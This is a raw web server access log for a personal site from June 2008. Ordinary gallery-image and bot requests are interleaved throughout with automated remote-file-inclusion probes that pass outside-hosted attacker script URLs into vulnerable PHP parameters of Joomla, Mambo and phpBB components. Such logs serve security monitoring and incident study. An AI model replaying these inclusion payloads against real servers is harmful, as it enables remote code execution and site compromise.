76.212.153.163 - - [09/Jun/2008:11:08:08 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0072.jpg HTTP/1.1" 200 274927 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:15 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0151.jpg HTTP/1.1" 200 352070 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:08:15 -0700] "GET /page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:22 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0087.jpg HTTP/1.1" 200 564281 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:08:25 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0171.jpg HTTP/1.1" 200 345976 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:08:35 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:35 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0047.jpg HTTP/1.1" 200 355990 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:08:35 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:08:36 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:08:37 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:08:38 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:08:38 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0153.jpg HTTP/1.1" 200 343210 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
77.55.90.2 - - [09/Jun/2008:11:08:47 -0700] "GET /logs/access_080106.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0128.jpg HTTP/1.1" 200 538292 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:08:51 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:08:52 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:08:52 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0165.jpg HTTP/1.1" 200 364141 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0015.jpg HTTP/1.1" 200 400412 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:10 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0162.jpg HTTP/1.1" 200 355966 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:11:09:14 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:18 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0010.jpg HTTP/1.1" 200 343766 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.108.67.119 - - [09/Jun/2008:11:09:19 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:09:21 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:24 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0145.jpg HTTP/1.1" 200 330556 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:31 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:32 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0006.jpg HTTP/1.1" 200 459527 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:32 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:32 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:09:32 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:32 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:09:37 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:37 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0175.jpg HTTP/1.1" 200 327600 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:44 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:44 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0044.jpg HTTP/1.1" 200 301948 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
62.233.130.174 - - [09/Jun/2008:11:09:49 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0163.jpg HTTP/1.1" 200 346344 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:09:52 -0700] "GET /logs/access_071218.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:09:52 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:09:53 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:56 -0700] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [09/Jun/2008:11:09:56 -0700] "GET //administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:09:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0005.jpg HTTP/1.1" 200 445675 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:10:01 -0700] "GET /logs/access_080216.log/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:10:01 -0700] "GET /errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:10:02 -0700] "GET /logs/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:10:02 -0700] "GET /logs/access_080219.log/errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:04 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0157.jpg HTTP/1.1" 200 311163 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0049.jpg HTTP/1.1" 200 421214 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:18 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 329003 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:10:20 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0078.jpg HTTP/1.1" 200 334837 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:10:29 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:31 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0148.jpg HTTP/1.1" 200 398432 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:10:38 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0088.jpg HTTP/1.1" 200 513493 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:45 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0140.jpg HTTP/1.1" 200 351155 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
213.194.149.215 - - [09/Jun/2008:11:10:45 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.164.131.35 - - [09/Jun/2008:11:10:53 -0700] "GET /logs//index.php?phpbb_root_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0031.jpg HTTP/1.1" 200 405520 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
193.164.131.35 - - [09/Jun/2008:11:10:55 -0700] "GET /logs/access_080215.log//index.php?phpbb_root_path=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:10:58 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0138_0.jpg HTTP/1.1" 200 386052 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:07 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0111.jpg HTTP/1.1" 200 377705 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:12 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0170.jpg HTTP/1.1" 200 360510 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:11:14 -0700] "GET /logs//modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:11:15 -0700] "GET //modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0030.jpg HTTP/1.1" 200 422859 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:25 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0146.jpg HTTP/1.1" 200 344149 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
211.189.26.170 - - [09/Jun/2008:11:11:26 -0700] "GET /logs/access_080225.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:34 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0109.jpg HTTP/1.1" 200 364454 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
220.162.238.35 - - [09/Jun/2008:11:11:36 -0700] "GET /logs/access_080429.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0144.jpg HTTP/1.1" 200 316667 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
65.55.213.30 - - [09/Jun/2008:11:11:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [09/Jun/2008:11:11:40 -0700] "GET /minamijewelry/html/bird.html HTTP/1.0" 200 20961 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:11:46 -0700] "GET /errors.php?error=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [09/Jun/2008:11:11:47 -0700] "GET /minamijewelry/html/terms.html HTTP/1.0" 200 13533 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:48 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0135.jpg HTTP/1.1" 200 385989 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:11:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0176.jpg HTTP/1.1" 200 328570 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:12:02 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0085.jpg HTTP/1.1" 200 483401 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:12:16 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0129.jpg HTTP/1.1" 200 467243 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:12:30 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0053.jpg HTTP/1.1" 200 443543 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:12:31 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:12:32 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.172.177.233 - - [09/Jun/2008:11:12:40 -0700] "GET /logs/access_080215.log/index.php?x=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:12:44 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0009.jpg HTTP/1.1" 200 308950 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
202.47.247.136 - - [09/Jun/2008:11:12:46 -0700] "GET /logs/index.php?x=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:12:47 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:11:12:47 -0700] "GET /index.php?x=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 200 16837 "-" "libwww-perl/5.79" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:12:47 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.111.11.7 - - [09/Jun/2008:11:12:54 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:12:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0067.jpg HTTP/1.1" 200 301438 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:13:08 -0700] "GET /logs//modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.132.4 - - [09/Jun/2008:11:13:08 -0700] "GET //modules/mod_as_category.php?mosConfig_absolute_path=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:11:13:10 -0700] "GET /logs/access_080207.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:13:11 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0076.jpg HTTP/1.1" 200 388166 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:14 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_039M.jpg HTTP/1.1" 200 115438 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:14 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_038M.jpg HTTP/1.1" 200 118507 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:15 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_036M.jpg HTTP/1.1" 200 106307 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
166.135.115.200 - - [09/Jun/2008:11:13:16 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_041M.jpg HTTP/1.1" 200 106932 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A102 Safari/419.3" "www.dmulk.com"
85.119.240.143 - - [09/Jun/2008:11:13:16 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://gbof.ca/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [09/Jun/2008:11:13:17 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gbof.ca/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [09/Jun/2008:11:13:17 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gbof.ca/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
